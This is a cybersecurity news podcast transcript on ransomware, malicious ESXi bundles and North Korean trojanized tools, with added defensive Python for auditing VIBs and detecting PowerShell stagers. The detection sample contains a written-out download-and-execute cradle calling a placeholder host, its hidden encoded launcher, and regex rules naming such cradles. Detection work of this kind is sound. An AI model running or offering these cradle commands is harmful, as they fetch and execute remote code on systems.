A new ransomware gang discovered, attacks on virtual servers and more.
Welcome to Cyber Security Today. It’s Friday, September 30th, 2022. I’m Howard Solomon, contributing reporter on cybersecurity for ITWorldCanada.com.
A new ransomware gang has been making its presence felt. According to the Bleeping Computer news service, the gang calls itself Royal and has been quietly operating since the beginning of the year. It uses several tactics to get an initial foothold in victim organizations. One is a callback phishing email claiming the employee is using a trial version of software and needs to phone a number to cancel the subscription before being billed. Those who call get a gang member trying to talk them into installing remote access software on their computer. Another tactic is exploiting a vulnerability in a company's internet-facing web application.
A threat actor is trying to take advantage of weakly protected VMware and Windows systems running virtual servers. Researchers at Mandiant have found a malware ecosystem supporting an unknown group that is installing backdoors on VMware ESXi hypervisors. They do it by installing malicious vSphere Installation Bundles, or VIBs. A VIB is the package format ESXi uses to distribute drivers, plugins and other software to hypervisors, so a malicious one gets loaded with the same trust as a legitimate update. It's important to note that the attacker needs admin-level access to the ESXi hypervisor before they can deploy this malware, so this is a persistence technique after a compromise, not the way in. That makes it important that VMware administrators follow recommended steps to harden their vSphere installations: keep the host's VIB acceptance level at PartnerSupported or higher, review the list of installed bundles for anything that isn't from VMware or a known partner, and enable UEFI Secure Boot on hosts, which stops unsigned bundles from loading at all.
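Here is an added example, not code from the original report or from Mandiant or VMware, of the review an administrator would run over the output of `esxcli software vib list` to spot bundles that don't belong. The sample output below is constructed for the example, and the vendor allowlist and the last-patch date are assumptions a real operator would fill in from their own change records. It flags a bundle when its acceptance level is below the host minimum, when its vendor is unknown, or when it was installed outside the last patch window; the last two checks matter because a malicious VIB can carry a forged descriptor that claims a higher acceptance level than it actually has.

```python
import re
from datetime import date

# ESXi acceptance levels, ordered from least to most trusted.
LEVELS = ["CommunitySupported", "PartnerSupported", "VMwareAccepted", "VMwareCertified"]

# Constructed sample of `esxcli software vib list` output (not from a real host).
# Fields are separated by two or more spaces, which is what the parser keys on.
SAMPLE_VIB_LIST = """\
Name        Version                          Vendor  Acceptance Level    Install Date
----------  -------------------------------  ------  ------------------  ------------
esx-base    7.0.3-0.35.19193900              VMW     VMwareCertified     2022-03-10
nvme-pcie   1.2.3.16-1vmw.703.0.20.19193900  VMW     VMwareCertified     2022-03-10
hpe-ilo     10.6.0-1OEM.700.1.0.15843807     HPE     PartnerSupported    2022-03-10
acme-agent  1.0-2                            Acme    PartnerSupported    2022-09-12
acme-tools  1.0-1                            Acme    CommunitySupported  2022-09-12
"""

# Assumed operator knowledge: which vendors are expected on this host and when
# it was last patched. Real values come from the site's change records.
VENDOR_ALLOWLIST = ("VMW", "HPE")
LAST_PATCH_DATE = date(2022, 3, 10)


def parse_vib_list(text):
    """Turn the tabular esxcli output into a list of dicts keyed by column name."""
    lines = [line for line in text.splitlines() if line.strip()]
    header = re.split(r"\s{2,}", lines[0].strip())
    rows = []
    for line in lines[2:]:  # skip the header and the dashed separator
        fields = re.split(r"\s{2,}", line.strip())
        if len(fields) != len(header):
            raise ValueError(f"unparsable row: {line!r}")
        rows.append(dict(zip(header, fields)))
    return rows


def level_rank(level):
    """Rank of an acceptance level; unknown strings rank below everything."""
    return LEVELS.index(level) if level in LEVELS else -1


def host_acceptance_ok(level, minimum="PartnerSupported"):
    """Check the value reported by `esxcli software acceptance get`."""
    return level_rank(level) >= level_rank(minimum)


def review_vibs(rows, minimum="PartnerSupported",
                vendor_allowlist=VENDOR_ALLOWLIST, last_patch=LAST_PATCH_DATE):
    """Return (name, reasons) for every bundle that fails at least one check."""
    findings = []
    for row in rows:
        reasons = []
        if level_rank(row["Acceptance Level"]) < level_rank(minimum):
            reasons.append("acceptance level below host minimum")
        if row["Vendor"] not in vendor_allowlist:
            reasons.append("vendor not on allowlist")
        if date.fromisoformat(row["Install Date"]) > last_patch:
            reasons.append("installed after last patch window")
        if reasons:
            findings.append((row["Name"], reasons))
    return findings


if __name__ == "__main__":
    for name, reasons in review_vibs(parse_vib_list(SAMPLE_VIB_LIST)):
        print(f"{name}: {', '.join(reasons)}")
```

On a real host the input would come from `esxcli software vib list` run over SSH, and a bundle flagged here should be followed up with `esxcli software vib signature verify` (ESXi 7 and later), since a forged descriptor can claim PartnerSupported while the bundle carries no valid signature.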
Trojanized versions of open source software utilities such as PuTTY, KiTTY, TightVNC, Sumatra PDF Reader and others are being used by a North Korea-based gang to spread malware in targeted organizations. That's according to Microsoft, which says the gang has successfully compromised numerous organizations since June for espionage, data theft, financial gain and network destruction. The group often initially connects with employees over LinkedIn, pretending to be job recruiters for various firms. Then, after establishing an online relationship, they convince victims to switch to WhatsApp. After that they try to get victims to download files that lead to infection. Targeted people have been engineers and technical support staff working at defence, aerospace, media and IT companies in the U.S., the U.K., India and Russia. Microsoft dubs this group Zinc, and says it is associated with the North Korean government.
Finally, an unnamed threat actor has been going after defence contractors who sell products to the U.S. military. Often victim employees fall for an email with an attachment that supposedly details the company's benefits, according to researchers at Securonix. Employees at any organization, but especially those in critical industries, have to be repeatedly warned against opening attachments even if they appear to come from a trusted email address. IT administrators should enable PowerShell script block logging so that the contents of scripts, including the decoded form of obfuscated ones, are recorded in the PowerShell event log. Logging doesn't stop PowerShell from being used as a malware deployment tool, but it makes the abuse visible to defenders. They should also install the Sysmon monitoring tool from Microsoft Sysinternals to record process creation, network connections and other endpoint activity that can be hunted over.
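As an added example of what those logs make possible, here is detection logic, not code from Securonix or from the original page, that scans script text for the patterns a PowerShell stager typically relies on: encoded commands, hidden windows, download cradles and `Invoke-Expression`. It runs over the `ScriptBlockText` field of PowerShell event 4104, which script block logging produces, and over the `CommandLine` field of Sysmon event 1, and it decodes any `-EncodedCommand` argument it finds so the rules also see what is hidden inside it. The sample script blocks, the hostname in the cradle and the rule names are constructed for the example.

```python
import base64
import re

# Detection rules keyed by name. The patterns are deliberately broad; in a real
# deployment they would be tuned against the site's own baseline.
RULES = {
    "encoded_command": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "invoke_expression": re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
    "download_cradle": re.compile(
        r"\b(?:Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|iwr|Start-BitsTransfer)\b",
        re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
}

# Constructed samples (not real telemetry). The first is the kind of text a
# benign 4104 event carries; the second is a hypothetical download cradle.
BENIGN_BLOCK = "Get-ChildItem -Path C:\\Users\\alice\\Documents -Recurse | Measure-Object"
CRADLE_BLOCK = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"

# The same cradle as it would appear in a Sysmon event 1 CommandLine: PowerShell
# expects -EncodedCommand to be base64 of the UTF-16LE script text.
ENCODED_ARG = base64.b64encode(CRADLE_BLOCK.encode("utf-16-le")).decode("ascii")
LAUNCH_COMMANDLINE = f"powershell.exe -NoP -W Hidden -EncodedCommand {ENCODED_ARG}"


def decode_encoded_command(text):
    """Return the decoded script behind an -e / -enc / -EncodedCommand argument,
    or None if there is no such argument or it does not decode cleanly."""
    match = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", text, re.I)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_script_text(text):
    """Return the sorted names of every rule that fires on the text, including
    on the decoded payload of an encoded command if one is present."""
    hits = {name for name, rx in RULES.items() if rx.search(text)}
    decoded = decode_encoded_command(text)
    if decoded:
        hits |= {name for name, rx in RULES.items() if rx.search(decoded)}
    return sorted(hits)


def triage(events):
    """events: iterable of (source, text) such as ('4104', ScriptBlockText) or
    ('sysmon-1', CommandLine). Returns only the events that fired a rule."""
    return [(source, analyze_script_text(text)) for source, text in events
            if analyze_script_text(text)]


if __name__ == "__main__":
    sample_events = [
        ("4104", BENIGN_BLOCK),
        ("4104", CRADLE_BLOCK),
        ("sysmon-1", LAUNCH_COMMANDLINE),
    ]
    for source, rules in triage(sample_events):
        print(f"{source}: {', '.join(rules)}")
```

Script block logging is enabled through Group Policy under Windows Components, Windows PowerShell, or directly via the registry value `EnableScriptBlockLogging` (DWORD 1) under `HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging`; once on, the decoded form of an obfuscated script lands in event 4104 in the Microsoft-Windows-PowerShell/Operational log, which is why the 4104 sample above is the plain cradle rather than its encoded launcher.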
That’s it for this morning. However, later today the Week in Review will be out with a discussion on Cybersecurity Awareness Month.
Follow Cyber Security Today on Apple Podcasts, Google Podcasts or add us to your Flash Briefing on your smart speaker.